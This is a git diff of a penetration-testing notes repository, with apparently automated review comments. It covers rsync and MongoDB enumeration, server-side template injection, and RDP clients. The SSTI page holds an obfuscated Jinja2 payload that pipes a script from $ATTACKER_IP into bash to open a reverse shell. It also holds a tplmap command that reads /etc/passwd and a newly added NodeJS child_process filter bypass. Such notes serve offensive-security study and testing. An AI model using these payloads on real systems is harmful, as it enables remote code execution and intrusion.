diff --git a/Enumeration/rsync.md b/Enumeration/rsync.md index f7fd55a..d875ac6 100644 --- a/Enumeration/rsync.md +++ b/Enumeration/rsync.md @@ -10,7 +10,9 @@ rsync :: rsync ::files rsync ::files/foo/ ``` + ### via netcat + * Another way is the following ```sh nc -vn $TARGET_IP 873 @@ -30,6 +32,7 @@ nc -vn $TARGET_IP 873 rsync @::/files/foo/bar.txt . rsync -r @::/files/foo . ``` +Use no credentials at all to connect anonymously. ## Uploads diff --git a/Exploits/Databases/MongoDB.md b/Exploits/Databases/MongoDB.md index d73b44d..7c786be 100644 --- a/Exploits/Databases/MongoDB.md +++ b/Exploits/Databases/MongoDB.md @@ -1,8 +1,26 @@ # MongoDB -* The cli tool is `mongo` +* The cli tool is `mongo`, there is also `mongo-sh` as an alternative * [List Databases of the DBMS](https://www.mongodb.com/docs/manual/reference/command/listDatabases/) +## List Databases + +```sh +show dbs +``` + +## List Collections + +```sh +show collections +``` + +## List Content of a Collection + +```sh +db..find().pretty() +``` + ## List users ```sh diff --git a/Exploits/Web/SSTI.md b/Exploits/Web/SSTI.md index 258f610..759ba2c 100644 --- a/Exploits/Web/SSTI.md +++ b/Exploits/Web/SSTI.md @@ -2,6 +2,7 @@ Pass in parameters to control the template. ## Usage + * Sanity test ```python {{2+2}} @@ -23,6 +24,7 @@ Pass in parameters to control the template. ``` ## Identification of Template Engine + Identify via payload checking * Smarty: `a{*comment*}b` * Mako: `${"z".join("ab")}` @@ -33,6 +35,7 @@ Identify via payload checking ``` ## Tools + ### TPlmap ```sh git clone https://github.com/epinna/tplmap.git @@ -50,6 +53,7 @@ tplmap -u http://:/ -d '' --os-cmd "cat /etc/passwd" ``` ### Countermeasure + * Remove everything in user input but alnum. Passing data, not data to f-string. ```python input = re.sub("[^A-Za-z0-9]", "", input) 
@@ -58,7 +62,12 @@ return render_template_string(template, input=input) ``` ## Bypass + * Save reverse shell as `rev` ```sh {{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}} ``` + +### NodeJS + +If functions like require are blacklisted and are unusable, use [built-in objects](https://nodejs.org/api/globals.html) of NodeJS. Bypass by using `process` can be done instead, e.g. `process.mainModule.require('child_process').execSync('id');`. diff --git a/Post Exploitation/Windows/Remote Desktop Protocol.md b/Post Exploitation/Windows/Remote Desktop Protocol.md new file mode 100644 index 0000000..bc9edcf --- /dev/null +++ b/Post Exploitation/Windows/Remote Desktop Protocol.md @@ -0,0 +1,7 @@ +# Remote Desktop Protocol RDP + +## Tools to Connect + +* `xfreerdp` +* `remmina` +* If nothing else is working use `rdesktop`
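Review bot: in the first `Enumeration/rsync.md` hunk (`@@ -10,7 +10,9 @@`), the new `### via netcat` heading is immediately followed by the bullet `* Another way is the following`, which now only repeats the heading; drop the bullet or turn it into a sentence that says what the netcat session shows (the rsync protocol banner and module listing). For consistency with the other headings in these files (`## Uploads`, `## Tools to Connect`), use title case: `### Via netcat`.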
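Review bot: in the second `Enumeration/rsync.md` hunk (`@@ -30,6 +32,7 @@`), the added sentence `Use no credentials at all to connect anonymously.` lands after the code block it describes and does not say which part of the command is left empty, so a reader reaching it after the examples cannot tell what it refers to. Move it above the block and tie it to the syntax, e.g. "Leave the user part of the `user@host::module` prefix empty to attempt an anonymous connection:", and keep the examples below it.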
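Review bot: in the `Exploits/Databases/MongoDB.md` hunk (`@@ -1,8 +1,26 @@`), the alternative shell is named `mongosh` (MongoDB Shell), not `mongo-sh`; the identifier should be corrected so the line is copy-pasteable. Two smaller points: the new `## List Databases` section duplicates the existing bullet linking to the `listDatabases` docs, so the two should be merged, and the `show dbs` / `show collections` / `db...find().pretty()` blocks are shell-of-mongo commands rather than `sh`, so the fences should be tagged `js` (or left untagged) to match what they contain.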
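Review bot: in the `Exploits/Web/SSTI.md` hunk at `@@ -50,6 +53,7 @@`, the only change is a blank line under `### Countermeasure`, but the adjacent context line `Passing data, not data to f-string.` is hard to parse; since the block is being touched anyway, reword it to state the actual mitigation shown in the following code, i.e. pass user input to the template as a parameter (`render_template_string(template, input=input)`) and never build the template string itself from user input. The regex filter on its own is a hardening measure, not the fix.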
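Review bot: in the `Exploits/Web/SSTI.md` hunk at `@@ -58,7 +62,12 @@`, the new `### NodeJS` subsection sits under `## Bypass`, whose existing bullet (`request|attr("application")...`) is a Jinja2/Flask payload that is not labelled as such; now that the section covers two engines, give the existing bullet its own `### Jinja2` subsection so the engine each entry applies to is explicit. The sentence `Bypass by using `process` can be done instead` is awkward; something like "`process` is a built-in global, so blocking `require` alone is not sufficient" reads better and also makes the defensive takeaway clear, which is worth echoing in the `### Countermeasure` section that currently only covers Python.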
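Review bot: in the new `Post Exploitation/Windows/Remote Desktop Protocol.md` file (`@@ -0,0 +1,7 @@`), the title `# Remote Desktop Protocol RDP` should read `# Remote Desktop Protocol (RDP)`, and the `## Tools to Connect` list names three clients without a single invocation, whereas the other pages in this set (rsync, MongoDB, tplmap) show the command for each tool. Add the basic connection line for at least `xfreerdp` with placeholder host and user, and state the default port (3389) so the page is useful on its own; the `rdesktop` fallback bullet should also say why it is the fallback (it does not support newer RDP security settings), otherwise the ordering is unexplained.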